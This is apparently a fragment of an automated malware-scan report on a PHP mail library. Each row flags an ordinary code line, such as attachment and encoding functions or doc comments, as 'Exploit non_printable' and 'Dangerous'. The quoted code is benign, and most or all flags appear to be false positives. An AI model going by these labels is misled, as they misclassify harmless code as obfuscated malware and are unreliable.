</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2783</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$value </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2789</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the file could not be found </span><span style="color: #007700">or </span><span style="color: #0000BB">read</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2800</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addAttachment</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'attachment'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2840</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">the </span><span style="color: #007700">array </span><span style="color: #0000BB">of attachments</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2843</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAttachments</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2845</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">attachment</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2856</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachAll</span><span style="color: #007700">(</span><span style="color: #0000BB">$disposition_type</span><span style="color: #007700">, </span><span style="color: #0000BB">$boundary</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2858</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return </span><span style="color: #0000BB">text of body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2954</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">''</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2969</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$mime</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2981</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeFile</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2996</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">returns false in 5.4</span><span style="color: #007700">+</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 29</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">leafClear</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">,</span><span style="color: #0000BB">$email</span><span style="color: #007700">){</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3010</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$file_buffer</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3025</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeString</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3050</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3061</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3070</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3072</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #DD0000">"\"</span><span style="color: #0000BB">$encoded</span><span style="color: #DD0000">\""</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3089</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3097</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">) && </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3098</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">which correctly encodes </span><span style="color: #007700">and </span><span style="color: #0000BB">wraps long</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3125</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasMultiBytes</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3127</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_strlen'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3128</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">) > </span><span style="color: #0000BB">mb_strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CharSet</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3129</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions anyway</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3139</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">has8bitChars</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3141</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[\x80-\xFF]/'</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3147</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">by paravoid</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3148</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">mb</span><span style="color: #007700">-</span><span style="color: #0000BB">encode</span><span style="color: #007700">-</span><span style="color: #0000BB">mimeheader</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#60283</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3154</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">base64EncodeWrapMB</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$linebreak </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3194</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">quoted</span><span style="color: #007700">-</span><span style="color: #0000BB">printable</span><span style="color: #007700">-</span><span style="color: #0000BB">decode</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#89417 Adapted from this comment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3196</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max </span><span style="color: #007700">= </span><span style="color: #0000BB">76</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3198</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function if </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s available (>= PHP5.3)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3199</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'quoted_printable_encode'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3200</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">quoted_printable_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3208</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/[^\r\n]{' </span><span style="color: #007700">. (</span><span style="color: #0000BB">$line_max </span><span style="color: #007700">- </span><span style="color: #0000BB">3</span><span style="color: #007700">) . </span><span style="color: #DD0000">'}[^=\r\n]{2}/'</span><span style="color: #007700">, </span><span style="color: #DD0000">"$0=\r\n"</span><span style="color: #007700">, </span><span style="color: #0000BB">$string</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3212</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">that was removed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3221</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQPphp</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3226</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeQP</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">, </span><span style="color: #0000BB">$line_max</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3237</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">encodeQ</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">, </span><span style="color: #0000BB">$position </span><span style="color: #007700">= </span><span style="color: #DD0000">'text'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3274</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">' '</span><span style="color: #007700">, </span><span style="color: #DD0000">'_'</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoded</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3288</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringAttachment</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3327</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean True on successfully adding an attachment</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3329</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addEmbeddedImage</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$cid</span><span style="color: #007700">, </span><span style="color: #0000BB">$name </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$encoding </span><span style="color: #007700">= </span><span style="color: #DD0000">'base64'</span><span style="color: #007700">, </span><span style="color: #0000BB">$type </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$disposition </span><span style="color: #007700">= </span><span style="color: #DD0000">'inline'</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path</span><span style="color: #007700">) </span><span style="color: #0000BB">of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3374</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addStringEmbeddedImage</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3406</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">inlineImageExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3420</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">attachmentExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 342</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">Return-</span><span style="color: #0000BB">Path of the message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3434</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">alternativeExists</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3436</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !empty(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">AltBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3445</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearQueuedAddresses</span><span style="color: #007700">(</span><span style="color: #0000BB">$kind</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3459</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">clearAddresses</span><span style="color: #007700">()</span>
</span>
